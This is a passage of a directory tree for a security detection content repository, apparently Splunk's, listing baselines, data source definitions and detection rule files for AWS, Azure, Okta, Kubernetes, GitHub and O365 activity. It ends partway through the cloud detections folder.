├── .github
├── CODEOWNERS
├── CONTRIBUTING.md
├── ISSUE_TEMPLATE
│ ├── bug_report.md
│ └── feature_request.md
├── config.yml
├── dependabot.yml
├── labeler.yml
├── pull_request_template.md
├── stale.yml
└── workflows
│ ├── appinspect.yml
│ ├── build.yml
│ ├── datasource-dependabot.yml
│ ├── format_test_results.py
│ ├── labeler.yml
│ ├── unit-testing.yml
│ └── update_data_sources_ta.py
├── .gitignore
├── .gitlab
└── merge_request_templates
│ └── release_branch.md
├── .gitpod.yml
├── .pre-commit-config.yaml
├── .vscode
├── launch.json
├── security-content.code-snippets
└── settings.json
├── CODE_OF_CONDUCT.md
├── LICENSE
├── README.md
├── SECURITY.md
├── app_template
├── README.md
├── README
│ ├── essoc_story_detail.txt
│ └── essoc_summary.txt
├── default
│ ├── data
│ │ └── ui
│ │ │ ├── nav
│ │ │ └── default.xml
│ │ │ └── views
│ │ │ ├── escu_summary.xml
│ │ │ └── feedback.xml
│ └── distsearch.conf
├── lookups
│ └── mitre_enrichment.csv
├── metadata
│ └── default.meta
└── static
│ ├── appIcon.png
│ ├── appIconAlt.png
│ ├── appIconAlt_2x.png
│ └── appIcon_2x.png
├── baselines
├── baseline_of_blocked_outbound_traffic_from_aws.yml
├── baseline_of_cloud_infrastructure_api_calls_per_user.yml
├── baseline_of_cloud_instances_destroyed.yml
├── baseline_of_cloud_instances_launched.yml
├── baseline_of_cloud_security_group_api_calls_per_user.yml
├── baseline_of_command_line_length___mltk.yml
├── baseline_of_dns_query_length___mltk.yml
├── baseline_of_kubernetes_container_network_io.yml
├── baseline_of_kubernetes_container_network_io_ratio.yml
├── baseline_of_kubernetes_process_resource.yml
├── baseline_of_kubernetes_process_resource_ratio.yml
├── baseline_of_network_acl_activity_by_arn.yml
├── baseline_of_open_s3_bucket_decommissioning.yml
├── baseline_of_s3_bucket_deletion_activity_by_arn.yml
├── baseline_of_security_group_activity_by_arn.yml
├── baseline_of_smb_traffic___mltk.yml
├── count_of_assets_by_category.yml
├── count_of_unique_ips_connecting_to_ports.yml
├── create_a_list_of_approved_aws_service_accounts.yml
├── deprecated
│ └── .gitkeep
├── discover_dns_records.yml
├── dnstwist_domain_names.yml
├── identify_systems_creating_remote_desktop_traffic.yml
├── identify_systems_receiving_remote_desktop_traffic.yml
├── identify_systems_using_remote_desktop.yml
├── previously_seen_cloud_api_calls_per_user_role___initial.yml
├── previously_seen_cloud_api_calls_per_user_role___update.yml
├── previously_seen_cloud_compute_creations_by_user___initial.yml
├── previously_seen_cloud_compute_creations_by_user___update.yml
├── previously_seen_cloud_compute_images___initial.yml
├── previously_seen_cloud_compute_images___update.yml
├── previously_seen_cloud_compute_instance_types___initial.yml
├── previously_seen_cloud_compute_instance_types___update.yml
├── previously_seen_cloud_instance_modifications_by_user___initial.yml
├── previously_seen_cloud_instance_modifications_by_user___update.yml
├── previously_seen_cloud_provisioning_activity_sources___initial.yml
├── previously_seen_cloud_provisioning_activity_sources___update.yml
├── previously_seen_cloud_regions___initial.yml
├── previously_seen_cloud_regions___update.yml
├── previously_seen_command_line_arguments.yml
├── previously_seen_running_windows_services___initial.yml
├── previously_seen_running_windows_services___update.yml
├── previously_seen_s3_bucket_access_by_remote_ip.yml
├── previously_seen_users_in_cloudtrail___initial.yml
├── previously_seen_users_in_cloudtrail___update.yml
├── previously_seen_zoom_child_processes___initial.yml
├── previously_seen_zoom_child_processes___update.yml
├── windows_updates_install_failures.yml
└── windows_updates_install_successes.yml
├── contentctl.yml
├── dashboards
├── .gitkeep
├── applocker.json
├── applocker.yml
├── rmm_software_tracking.json
├── rmm_software_tracking.yml
├── threat_activity_by_snort_ids.json
└── threat_activity_by_snort_ids.yml
├── data_sources
├── asl_aws_cloudtrail.yml
├── aws_cloudfront.yml
├── aws_cloudtrail.yml
├── aws_cloudtrail_assumerolewithsaml.yml
├── aws_cloudtrail_consolelogin.yml
├── aws_cloudtrail_copyobject.yml
├── aws_cloudtrail_createaccesskey.yml
├── aws_cloudtrail_createkey.yml
├── aws_cloudtrail_createloginprofile.yml
├── aws_cloudtrail_createnetworkaclentry.yml
├── aws_cloudtrail_createpolicyversion.yml
├── aws_cloudtrail_createsnapshot.yml
├── aws_cloudtrail_createtask.yml
├── aws_cloudtrail_createvirtualmfadevice.yml
├── aws_cloudtrail_deactivatemfadevice.yml
├── aws_cloudtrail_deleteaccountpasswordpolicy.yml
├── aws_cloudtrail_deletealarms.yml
├── aws_cloudtrail_deletedetector.yml
├── aws_cloudtrail_deletegroup.yml
├── aws_cloudtrail_deleteguardrail.yml
├── aws_cloudtrail_deleteipset.yml
├── aws_cloudtrail_deleteknowledgebase.yml
├── aws_cloudtrail_deleteloggingconfiguration.yml
├── aws_cloudtrail_deleteloggroup.yml
├── aws_cloudtrail_deletelogstream.yml
├── aws_cloudtrail_deletemodelinvocationloggingconfiguration.yml
├── aws_cloudtrail_deletenetworkaclentry.yml
├── aws_cloudtrail_deletepolicy.yml
├── aws_cloudtrail_deleterule.yml
├── aws_cloudtrail_deleterulegroup.yml
├── aws_cloudtrail_deletesnapshot.yml
├── aws_cloudtrail_deletetrail.yml
├── aws_cloudtrail_deletevirtualmfadevice.yml
├── aws_cloudtrail_deletewebacl.yml
├── aws_cloudtrail_describeeventaggregates.yml
├── aws_cloudtrail_describeimagescanfindings.yml
├── aws_cloudtrail_describesnapshotattribute.yml
├── aws_cloudtrail_getaccountpasswordpolicy.yml
├── aws_cloudtrail_getobject.yml
├── aws_cloudtrail_getpassworddata.yml
├── aws_cloudtrail_invokemodel.yml
├── aws_cloudtrail_jobcreated.yml
├── aws_cloudtrail_listfoundationmodels.yml
├── aws_cloudtrail_modifydbinstance.yml
├── aws_cloudtrail_modifyimageattribute.yml
├── aws_cloudtrail_modifysnapshotattribute.yml
├── aws_cloudtrail_putbucketacl.yml
├── aws_cloudtrail_putbucketlifecycle.yml
├── aws_cloudtrail_putbucketreplication.yml
├── aws_cloudtrail_putbucketversioning.yml
├── aws_cloudtrail_putimage.yml
├── aws_cloudtrail_putkeypolicy.yml
├── aws_cloudtrail_replacenetworkaclentry.yml
├── aws_cloudtrail_setdefaultpolicyversion.yml
├── aws_cloudtrail_stoplogging.yml
├── aws_cloudtrail_updateaccountpasswordpolicy.yml
├── aws_cloudtrail_updateloginprofile.yml
├── aws_cloudtrail_updatesamlprovider.yml
├── aws_cloudtrail_updatetrail.yml
├── aws_cloudwatchlogs_vpcflow.yml
├── aws_security_hub.yml
├── azure_active_directory.yml
├── azure_active_directory_add_app_role_assignment_to_service_principal.yml
├── azure_active_directory_add_member_to_role.yml
├── azure_active_directory_add_owner_to_application.yml
├── azure_active_directory_add_service_principal.yml
├── azure_active_directory_add_unverified_domain.yml
├── azure_active_directory_consent_to_application.yml
├── azure_active_directory_disable_strong_authentication.yml
├── azure_active_directory_enable_account.yml
├── azure_active_directory_invite_external_user.yml
├── azure_active_directory_microsoftgraphactivitylogs.yml
├── azure_active_directory_noninteractiveusersigninlogs.yml
├── azure_active_directory_reset_password_(by_admin).yml
├── azure_active_directory_set_domain_authentication.yml
├── azure_active_directory_sign_in_activity.yml
├── azure_active_directory_update_application.yml
├── azure_active_directory_update_authorization_policy.yml
├── azure_active_directory_update_user.yml
├── azure_active_directory_user_registered_security_info.yml
├── azure_audit_create_or_update_an_azure_automation_account.yml
├── azure_audit_create_or_update_an_azure_automation_runbook.yml
├── azure_audit_create_or_update_an_azure_automation_webhook.yml
├── azure_monitor_activity.yml
├── bro_conn.yml
├── bro_dns.yml
├── bro_files.yml
├── bro_http.yml
├── bro_loaded_scripts.yml
├── bro_ntp.yml
├── bro_ocsp.yml
├── bro_ssl.yml
├── bro_weird.yml
├── bro_x509.yml
├── circleci.yml
├── cisco_ai_defense_alerts.yml
├── cisco_secure_application_appdynamics_alerts.yml
├── cisco_secure_firewall_threat_defense_connection_event.yml
├── cisco_secure_firewall_threat_defense_file_event.yml
├── cisco_secure_firewall_threat_defense_intrusion_event.yml
├── crowdstrike_processrollup2.yml
├── crushftp.yml
├── g_suite_drive.yml
├── g_suite_gmail.yml
├── github_enterprise_audit_logs.yml
├── github_organizations_audit_logs.yml
├── github_webhooks.yml
├── google_workspace.yml
├── google_workspace_login_failure.yml
├── google_workspace_login_success.yml
├── ivanti_vtm_audit.yml
├── kubernetes_audit.yml
├── kubernetes_falco.yml
├── linux_auditd_add_user.yml
├── linux_auditd_execve.yml
├── linux_auditd_path.yml
├── linux_auditd_proctitle.yml
├── linux_auditd_service_stop.yml
├── linux_auditd_syscall.yml
├── linux_secure.yml
├── ms365_defender_incident_alerts.yml
├── ms_defender_atp_alerts.yml
├── nginx_access.yml
├── ntlm_operational_8004.yml
├── ntlm_operational_8005.yml
├── ntlm_operational_8006.yml
├── o365.yml
├── o365_add_app_role_assignment_grant_to_user_.yml
├── o365_add_app_role_assignment_to_service_principal_.yml
├── o365_add_mailboxpermission.yml
├── o365_add_member_to_role_.yml
├── o365_add_owner_to_application_.yml
├── o365_add_service_principal_.yml
├── o365_change_user_license_.yml
├── o365_consent_to_application_.yml
├── o365_disable_strong_authentication_.yml
├── o365_mailitemsaccessed.yml
├── o365_modifyfolderpermissions.yml
├── o365_set_company_information_.yml
├── o365_set_mailbox.yml
├── o365_update_application_.yml
├── o365_update_authorization_policy_.yml
├── o365_update_user_.yml
├── o365_userloggedin.yml
├── o365_userloginfailed.yml
├── office_365_reporting_message_trace.yml
├── office_365_universal_audit_log.yml
├── okta.yml
├── osquery.yml
├── palo_alto_network_threat.yml
├── palo_alto_network_traffic.yml
├── pingid.yml
├── powershell_installed_iis_modules.yml
├── powershell_script_block_logging_4104.yml
├── powershell_sip_inventory.yml
├── splunk.yml
├── splunk_common_information_model_(cim).yml
├── splunk_stream_http.yml
├── splunk_stream_ip.yml
├── splunk_stream_tcp.yml
├── suricata.yml
├── sysmon_eventid_1.yml
├── sysmon_eventid_10.yml
├── sysmon_eventid_11.yml
├── sysmon_eventid_12.yml
├── sysmon_eventid_13.yml
├── sysmon_eventid_14.yml
├── sysmon_eventid_15.yml
├── sysmon_eventid_17.yml
├── sysmon_eventid_18.yml
├── sysmon_eventid_20.yml
├── sysmon_eventid_21.yml
├── sysmon_eventid_22.yml
├── sysmon_eventid_23.yml
├── sysmon_eventid_26.yml
├── sysmon_eventid_3.yml
├── sysmon_eventid_5.yml
├── sysmon_eventid_6.yml
├── sysmon_eventid_7.yml
├── sysmon_eventid_8.yml
├── sysmon_eventid_9.yml
├── sysmon_for_linux_eventid_1.yml
├── sysmon_for_linux_eventid_11.yml
├── windows_active_directory_admon.yml
├── windows_defender_alerts.yml
├── windows_event_log_application_15457.yml
├── windows_event_log_application_17135.yml
├── windows_event_log_application_2282.yml
├── windows_event_log_application_3000.yml
├── windows_event_log_application_8128.yml
├── windows_event_log_capi2_70.yml
├── windows_event_log_capi2_81.yml
├── windows_event_log_certificateservicesclient_1007.yml
├── windows_event_log_defender_1121.yml
├── windows_event_log_defender_1122.yml
├── windows_event_log_defender_1125.yml
├── windows_event_log_defender_1126.yml
├── windows_event_log_defender_1129.yml
├── windows_event_log_defender_1131.yml
├── windows_event_log_defender_1132.yml
├── windows_event_log_defender_1133.yml
├── windows_event_log_defender_1134.yml
├── windows_event_log_defender_5007.yml
├── windows_event_log_microsoft_windows_terminalservices_rdpclient_1024.yml
├── windows_event_log_printservice_316.yml
├── windows_event_log_printservice_4909.yml
├── windows_event_log_printservice_808.yml
├── windows_event_log_remoteconnectionmanager_1149.yml
├── windows_event_log_security_1100.yml
├── windows_event_log_security_1102.yml
├── windows_event_log_security_4624.yml
├── windows_event_log_security_4625.yml
├── windows_event_log_security_4627.yml
├── windows_event_log_security_4648.yml
├── windows_event_log_security_4662.yml
├── windows_event_log_security_4663.yml
├── windows_event_log_security_4672.yml
├── windows_event_log_security_4688.yml
├── windows_event_log_security_4698.yml
├── windows_event_log_security_4699.yml
├── windows_event_log_security_4700.yml
├── windows_event_log_security_4702.yml
├── windows_event_log_security_4703.yml
├── windows_event_log_security_4719.yml
├── windows_event_log_security_4720.yml
├── windows_event_log_security_4724.yml
├── windows_event_log_security_4725.yml
├── windows_event_log_security_4726.yml
├── windows_event_log_security_4727.yml
├── windows_event_log_security_4728.yml
├── windows_event_log_security_4730.yml
├── windows_event_log_security_4731.yml
├── windows_event_log_security_4732.yml
├── windows_event_log_security_4737.yml
├── windows_event_log_security_4738.yml
├── windows_event_log_security_4739.yml
├── windows_event_log_security_4741.yml
├── windows_event_log_security_4742.yml
├── windows_event_log_security_4744.yml
├── windows_event_log_security_4749.yml
├── windows_event_log_security_4754.yml
├── windows_event_log_security_4759.yml
├── windows_event_log_security_4768.yml
├── windows_event_log_security_4769.yml
├── windows_event_log_security_4771.yml
├── windows_event_log_security_4776.yml
├── windows_event_log_security_4781.yml
├── windows_event_log_security_4783.yml
├── windows_event_log_security_4790.yml
├── windows_event_log_security_4794.yml
├── windows_event_log_security_4798.yml
├── windows_event_log_security_4876.yml
├── windows_event_log_security_4886.yml
├── windows_event_log_security_4887.yml
├── windows_event_log_security_4946.yml
├── windows_event_log_security_4947.yml
├── windows_event_log_security_4948.yml
├── windows_event_log_security_5136.yml
├── windows_event_log_security_5137.yml
├── windows_event_log_security_5140.yml
├── windows_event_log_security_5141.yml
├── windows_event_log_security_5145.yml
├── windows_event_log_system_104.yml
├── windows_event_log_system_4720.yml
├── windows_event_log_system_4726.yml
├── windows_event_log_system_4728.yml
├── windows_event_log_system_7036.yml
├── windows_event_log_system_7040.yml
├── windows_event_log_system_7045.yml
├── windows_event_log_taskscheduler_200.yml
├── windows_event_log_taskscheduler_201.yml
├── windows_iis.yml
├── windows_iis_29.yml
└── zeek_conn.yml
├── deployments
├── escu_default_configuration_anomaly.yml
├── escu_default_configuration_baseline.yml
├── escu_default_configuration_correlation.yml
├── escu_default_configuration_hunting.yml
└── escu_default_configuration_ttp.yml
├── detections
├── application
│ ├── cisco_ai_defense_security_alerts_by_application_name.yml
│ ├── cisco_secure_application_alerts.yml
│ ├── crushftp_server_side_template_injection.yml
│ ├── detect_distributed_password_spray_attempts.yml
│ ├── detect_html_help_spawn_child_process.yml
│ ├── detect_new_login_attempts_to_routers.yml
│ ├── detect_password_spray_attempts.yml
│ ├── email_attachments_with_lots_of_spaces.yml
│ ├── email_files_written_outside_of_the_outlook_directory.yml
│ ├── email_servers_sending_high_volume_traffic_to_hosts.yml
│ ├── ivanti_vtm_new_account_creation.yml
│ ├── monitor_email_for_brand_abuse.yml
│ ├── no_windows_updates_in_a_time_frame.yml
│ ├── okta_authentication_failed_during_mfa_challenge.yml
│ ├── okta_idp_lifecycle_modifications.yml
│ ├── okta_mfa_exhaustion_hunt.yml
│ ├── okta_mismatch_between_source_and_response_for_verify_push_request.yml
│ ├── okta_multi_factor_authentication_disabled.yml
│ ├── okta_multiple_accounts_locked_out.yml
│ ├── okta_multiple_failed_mfa_requests_for_user.yml
│ ├── okta_multiple_failed_requests_to_access_applications.yml
│ ├── okta_multiple_users_failing_to_authenticate_from_ip.yml
│ ├── okta_new_api_token_created.yml
│ ├── okta_new_device_enrolled_on_account.yml
│ ├── okta_phishing_detection_with_fastpass_origin_check.yml
│ ├── okta_risk_threshold_exceeded.yml
│ ├── okta_successful_single_factor_authentication.yml
│ ├── okta_suspicious_activity_reported.yml
│ ├── okta_suspicious_use_of_a_session_cookie.yml
│ ├── okta_threatinsight_threat_detected.yml
│ ├── okta_unauthorized_access_to_application.yml
│ ├── okta_user_logins_from_multiple_cities.yml
│ ├── pingid_mismatch_auth_source_and_verification_response.yml
│ ├── pingid_multiple_failed_mfa_requests_for_user.yml
│ ├── pingid_new_mfa_method_after_credential_reset.yml
│ ├── pingid_new_mfa_method_registered_for_user.yml
│ ├── suspicious_email_attachment_extensions.yml
│ └── suspicious_java_classes.yml
├── cloud
│ ├── abnormally_high_number_of_cloud_infrastructure_api_calls.yml
│ ├── abnormally_high_number_of_cloud_instances_destroyed.yml
│ ├── abnormally_high_number_of_cloud_instances_launched.yml
│ ├── abnormally_high_number_of_cloud_security_group_api_calls.yml
│ ├── amazon_eks_kubernetes_cluster_scan_detection.yml
│ ├── amazon_eks_kubernetes_pod_scan_detection.yml
│ ├── asl_aws_concurrent_sessions_from_different_ips.yml
│ ├── asl_aws_create_access_key.yml
│ ├── asl_aws_create_policy_version_to_allow_all_resources.yml
│ ├── asl_aws_credential_access_getpassworddata.yml
│ ├── asl_aws_credential_access_rds_password_reset.yml
│ ├── asl_aws_defense_evasion_delete_cloudtrail.yml
│ ├── asl_aws_defense_evasion_delete_cloudwatch_log_group.yml
│ ├── asl_aws_defense_evasion_impair_security_services.yml
│ ├── asl_aws_defense_evasion_putbucketlifecycle.yml
│ ├── asl_aws_defense_evasion_stop_logging_cloudtrail.yml
│ ├── asl_aws_defense_evasion_update_cloudtrail.yml
│ ├── asl_aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
│ ├── asl_aws_disable_bucket_versioning.yml
│ ├── asl_aws_ec2_snapshot_shared_externally.yml
│ ├── asl_aws_ecr_container_upload_outside_business_hours.yml
│ ├── asl_aws_ecr_container_upload_unknown_user.yml
│ ├── asl_aws_iam_accessdenied_discovery_events.yml
│ ├── asl_aws_iam_assume_role_policy_brute_force.yml
│ ├── asl_aws_iam_delete_policy.yml
│ ├── asl_aws_iam_failure_group_deletion.yml
│ ├── asl_aws_iam_successful_group_deletion.yml
│ ├── asl_aws_multi_factor_authentication_disabled.yml
│ ├── asl_aws_network_access_control_list_created_with_all_open_ports.yml
│ ├── asl_aws_network_access_control_list_deleted.yml
│ ├── asl_aws_new_mfa_method_registered_for_user.yml
│ ├── asl_aws_saml_update_identity_provider.yml
│ ├── asl_aws_updateloginprofile.yml
│ ├── aws_ami_attribute_modification_for_exfiltration.yml
│ ├── aws_bedrock_delete_guardrails.yml
│ ├── aws_bedrock_delete_knowledge_base.yml
│ ├── aws_bedrock_delete_model_invocation_logging_configuration.yml
│ ├── aws_bedrock_high_number_list_foundation_model_failures.yml
│ ├── aws_bedrock_invoke_model_access_denied.yml
│ ├── aws_concurrent_sessions_from_different_ips.yml
│ ├── aws_console_login_failed_during_mfa_challenge.yml
│ ├── aws_create_policy_version_to_allow_all_resources.yml
│ ├── aws_createaccesskey.yml
│ ├── aws_createloginprofile.yml
│ ├── aws_credential_access_failed_login.yml
│ ├── aws_credential_access_getpassworddata.yml
│ ├── aws_credential_access_rds_password_reset.yml
│ ├── aws_defense_evasion_delete_cloudtrail.yml
│ ├── aws_defense_evasion_delete_cloudwatch_log_group.yml
│ ├── aws_defense_evasion_impair_security_services.yml
│ ├── aws_defense_evasion_putbucketlifecycle.yml
│ ├── aws_defense_evasion_stop_logging_cloudtrail.yml
│ ├── aws_defense_evasion_update_cloudtrail.yml
│ ├── aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
│ ├── aws_detect_users_with_kms_keys_performing_encryption_s3.yml
│ ├── aws_disable_bucket_versioning.yml
│ ├── aws_ec2_snapshot_shared_externally.yml
│ ├── aws_ecr_container_scanning_findings_high.yml
│ ├── aws_ecr_container_scanning_findings_low_informational_unknown.yml
│ ├── aws_ecr_container_scanning_findings_medium.yml
│ ├── aws_ecr_container_upload_outside_business_hours.yml
│ ├── aws_ecr_container_upload_unknown_user.yml
│ ├── aws_excessive_security_scanning.yml
│ ├── aws_exfiltration_via_anomalous_getobject_api_activity.yml
│ ├── aws_exfiltration_via_batch_service.yml
│ ├── aws_exfiltration_via_bucket_replication.yml
│ ├── aws_exfiltration_via_datasync_task.yml
│ ├── aws_exfiltration_via_ec2_snapshot.yml
│ ├── aws_high_number_of_failed_authentications_for_user.yml
│ ├── aws_high_number_of_failed_authentications_from_ip.yml
│ ├── aws_iam_accessdenied_discovery_events.yml
│ ├── aws_iam_assume_role_policy_brute_force.yml
│ ├── aws_iam_delete_policy.yml
│ ├── aws_iam_failure_group_deletion.yml
│ ├── aws_iam_successful_group_deletion.yml
│ ├── aws_lambda_updatefunctioncode.yml
│ ├── aws_multi_factor_authentication_disabled.yml
│ ├── aws_multiple_failed_mfa_requests_for_user.yml
│ ├── aws_multiple_users_failing_to_authenticate_from_ip.yml
│ ├── aws_network_access_control_list_created_with_all_open_ports.yml
│ ├── aws_network_access_control_list_deleted.yml
│ ├── aws_new_mfa_method_registered_for_user.yml
│ ├── aws_password_policy_changes.yml
│ ├── aws_s3_exfiltration_behavior_identified.yml
│ ├── aws_saml_update_identity_provider.yml
│ ├── aws_setdefaultpolicyversion.yml
│ ├── aws_successful_console_authentication_from_multiple_ips.yml
│ ├── aws_successful_single_factor_authentication.yml
│ ├── aws_unusual_number_of_failed_authentications_from_ip.yml
│ ├── aws_updateloginprofile.yml
│ ├── azure_active_directory_high_risk_sign_in.yml
│ ├── azure_ad_admin_consent_bypassed_by_service_principal.yml
│ ├── azure_ad_application_administrator_role_assigned.yml
│ ├── azure_ad_authentication_failed_during_mfa_challenge.yml
│ ├── azure_ad_azurehound_useragent_detected.yml
│ ├── azure_ad_block_user_consent_for_risky_apps_disabled.yml
│ ├── azure_ad_concurrent_sessions_from_different_ips.yml
│ ├── azure_ad_device_code_authentication.yml
│ ├── azure_ad_external_guest_user_invited.yml
│ ├── azure_ad_fullaccessasapp_permission_assigned.yml
│ ├── azure_ad_global_administrator_role_assigned.yml
│ ├── azure_ad_high_number_of_failed_authentications_for_user.yml
│ ├── azure_ad_high_number_of_failed_authentications_from_ip.yml
│ ├── azure_ad_multi_factor_authentication_disabled.yml
│ ├── azure_ad_multi_source_failed_authentications_spike.yml
│ ├── azure_ad_multiple_appids_and_useragents_authentication_spike.yml
│ ├── azure_ad_multiple_denied_mfa_requests_for_user.yml
│ ├── azure_ad_multiple_failed_mfa_requests_for_user.yml
│ ├── azure_ad_multiple_service_principals_created_by_sp.yml
│ ├── azure_ad_multiple_service_principals_created_by_user.yml
│ ├── azure_ad_multiple_users_failing_to_authenticate_from_ip.yml
│ ├── azure_ad_new_custom_domain_added.yml
│ ├── azure_ad_new_federated_domain_added.yml
│ ├── azure_ad_new_mfa_method_registered.yml
│ ├── azure_ad_new_mfa_method_registered_for_user.yml
│ ├── azure_ad_oauth_application_consent_granted_by_user.yml
│ ├── azure_ad_pim_role_assigned.yml
│ ├── azure_ad_pim_role_assignment_activated.yml
│ ├── azure_ad_privileged_authentication_administrator_role_assigned.yml
│ ├── azure_ad_privileged_graph_api_permission_assigned.yml
│ ├── azure_ad_privileged_role_assigned.yml
│ ├── azure_ad_privileged_role_assigned_to_service_principal.yml
│ ├── azure_ad_service_principal_authentication.yml
│ ├── azure_ad_service_principal_created.yml
│ ├── azure_ad_service_principal_enumeration.yml
│ ├── azure_ad_service_principal_new_client_credentials.yml
│ ├── azure_ad_service_principal_owner_added.yml
│ ├── azure_ad_service_principal_privilege_escalation.yml
│ ├── azure_ad_successful_authentication_from_different_ips.yml
│ ├── azure_ad_successful_powershell_authentication.yml
│ ├── azure_ad_successful_single_factor_authentication.yml
│ ├── azure_ad_tenant_wide_admin_consent_granted.yml
│ ├── azure_ad_unusual_number_of_failed_authentications_from_ip.yml
│ ├── azure_ad_user_consent_blocked_for_risky_application.yml
│ ├── azure_ad_user_consent_denied_for_oauth_application.yml
│ ├── azure_ad_user_enabled_and_password_reset.yml
│ ├── azure_ad_user_immutableid_attribute_updated.yml
│ ├── azure_automation_account_created.yml
│ ├── azure_automation_runbook_created.yml
│ ├── azure_runbook_webhook_created.yml
│ ├── circle_ci_disable_security_job.yml
│ ├── circle_ci_disable_security_step.yml
│ ├── cloud_api_calls_from_previously_unseen_user_roles.yml
│ ├── cloud_compute_instance_created_by_previously_unseen_user.yml
│ ├── cloud_compute_instance_created_in_previously_unused_region.yml
│ ├── cloud_compute_instance_created_with_previously_unseen_image.yml
│ ├── cloud_compute_instance_created_with_previously_unseen_instance_type.yml
│ ├── cloud_instance_modified_by_previously_unseen_user.yml
│ ├── cloud_provisioning_activity_from_previously_unseen_city.yml
│ ├── cloud_provisioning_activity_from_previously_unseen_country.yml
│ ├── cloud_provisioning_activity_from_previously_unseen_ip_address.yml
│ ├── cloud_provisioning_activity_from_previously_unseen_region.yml
│ ├── cloud_security_groups_modifications_by_user.yml
│ ├── detect_aws_console_login_by_new_user.yml
│ ├── detect_aws_console_login_by_user_from_new_city.yml
│ ├── detect_aws_console_login_by_user_from_new_country.yml
│ ├── detect_aws_console_login_by_user_from_new_region.yml
│ ├── detect_gcp_storage_access_from_a_new_ip.yml
│ ├── detect_new_open_gcp_storage_buckets.yml
│ ├── detect_new_open_s3_buckets.yml
│ ├── detect_new_open_s3_buckets_over_aws_cli.yml
│ ├── detect_s3_access_from_a_new_ip.yml
│ ├── detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
│ ├── detect_spike_in_aws_security_hub_alerts_for_user.yml
│ ├── detect_spike_in_blocked_outbound_traffic_from_your_aws.yml
│ ├── detect_spike_in_s3_bucket_deletion.yml
│ ├── gcp_authentication_failed_during_mfa_challenge.yml
│ ├── gcp_detect_gcploit_framework.yml
│ ├── gcp_kubernetes_cluster_pod_scan_detection.yml
│ ├── gcp_multi_factor_authentication_disabled.yml
│ ├── gcp_multiple_failed_mfa_requests_for_user.yml
│ ├── gcp_multiple_users_failing_to_authenticate_from_ip.yml
│ ├── gcp_successful_single_factor_authentication.yml
│ ├── gcp_unusual_number_of_failed_authentications_from_ip.yml
│ ├── gdrive_suspicious_file_sharing.yml
│ ├── github_enterprise_delete_branch_ruleset.yml
│ ├── github_enterprise_disable_2fa_requirement.yml
│ ├── github_enterprise_disable_audit_log_event_stream.yml
│ ├── github_enterprise_disable_classic_branch_protection_rule.yml
│ ├── github_enterprise_disable_dependabot.yml
│ ├── github_enterprise_disable_ip_allow_list.yml
│ ├── github_enterprise_modify_audit_log_event_stream.yml
│ ├── github_enterprise_pause_audit_log_event_stream.yml
│ ├── github_enterprise_register_self_hosted_runner.yml
│ ├── github_enterprise_remove_organization.yml
│ ├── github_enterprise_repository_archived.yml
│ ├── github_enterprise_repository_deleted.yml
│ ├── github_organizations_delete_branch_ruleset.yml
│ ├── github_organizations_disable_2fa_requirement.yml
│ ├── github_organizations_disable_classic_branch_protection_rule.yml
│ ├── github_organizations_disable_dependabot.yml
│ ├── github_organizations_repository_archived.yml
│ ├── github_organizations_repository_deleted.yml
│ ├── gsuite_drive_share_in_external_email.yml
│ ├── gsuite_email_suspicious_attachment.yml
│ ├── gsuite_email_suspicious_subject_with_attachment.yml
│ ├── gsuite_email_with_known_abuse_web_service_link.yml
│ ├── gsuite_outbound_email_with_attachment_to_external_domain.yml
│ ├── gsuite_suspicious_calendar_invite.yml
│ ├── gsuite_suspicious_shared_file_name.yml
│ ├── high_number_of_login_failures_from_a_single_source.yml
│ ├── kubernetes_abuse_of_secret_by_unusual_location.yml
│ ├── kubernetes_abuse_of_secret_by_unusual_user_agent.yml
│ ├── kubernetes_abuse_of_secret_by_unusual_user_group.yml
│ ├── kubernetes_abuse_of_secret_by_unusual_user_name.yml
│ ├── kubernetes_access_scanning.yml
│ ├── kubernetes_anomalous_inbound_network_activity_from_process.yml
│ ├── kubernetes_anomalous_inbound_outbound_network_io.yml
│ ├── kubernetes_anomalous_inbound_to_outbound_network_io_ratio.yml
│ ├── kubernetes_anomalous_outbound_network_activity_from_process.yml
│ ├── kubernetes_anomalous_traffic_on_network_edge.yml
│ ├── kubernetes_aws_detect_suspicious_kubectl_calls.yml
│ ├── kubernetes_create_or_update_privileged_pod.yml
│ ├── kubernetes_cron_job_creation.yml
│ ├── kubernetes_daemonset_deployed.yml
│ ├── kubernetes_falco_shell_spawned.yml
│ ├── kubernetes_newly_seen_tcp_edge.yml
│ ├── kubernetes_newly_seen_udp_edge.yml
│ ├── kubernetes_nginx_ingress_lfi.yml
│ ├── kubernetes_nginx_ingress_rfi.yml
│ ├── kubernetes_node_port_creation.yml
│ ├── kubernetes_pod_created_in_default_namespace.yml
│ ├── kubernetes_pod_with_host_network_attachment.yml
│ ├── kubernetes_previously_unseen_container_image_name.yml
│ ├── kubernetes_previously_unseen_process.yml
│ ├── kubernetes_process_running_from_new_path.yml
│ ├── kubernetes_process_with_anomalous_resource_utilisation.yml
│ ├── kubernetes_process_with_resource_ratio_anomalies.yml
│ ├── kubernetes_scanner_image_pulling.yml
│ ├── kubernetes_scanning_by_unauthenticated_ip_address.yml
│ ├── kubernetes_shell_running_on_worker_node.yml
│ ├── kubernetes_shell_running_on_worker_node_with_cpu_activity.yml
│ ├── kubernetes_suspicious_image_pulling.yml
│ ├── kubernetes_unauthorized_access.yml
│ ├── microsoft_intune_device_health_scripts.yml
│ ├── microsoft_intune_devicemanagementconfigurationpolicies.yml
│ ├── microsoft_intune_manual_device_management.yml
│ ├── microsoft_intune_mobile_apps.yml
│ ├── o365_add_app_role_assignment_grant_user.yml
│ ├── o365_added_service_principal.yml
│ ├── o365_admin_consent_bypassed_by_service_principal.yml
│ ├── o365_advanced_audit_disabled.yml
│ ├── o365_application_available_to_other_tenants.yml
│ ├── o365_application_registration_owner_added.yml
│ ├── o365_applicationimpersonation_role_assigned.yml
│ ├── o365_bec_email_hiding_rule_created.yml
│ ├── o365_block_user_consent_for_risky_apps_disabled.yml
│ ├── o365_bypass_mfa_via_trusted_ip.yml
│ ├── o365_compliance_content_search_exported.yml
│ ├── o365_compliance_content_search_started.yml
│ ├── o365_concurrent_sessions_from_different_ips.yml
│ ├── o365_cross_tenant_access_change.yml
│ ├── o365_disable_mfa.yml
│ ├── o365_dlp_rule_triggered.yml
│ ├── o365_elevated_mailbox_permission_assigned.yml
│ ├── o365_email_access_by_security_administrator.yml
│ ├── o365_email_hard_delete_excessive_volume.yml
│ ├── o365_email_new_inbox_rule_created.yml
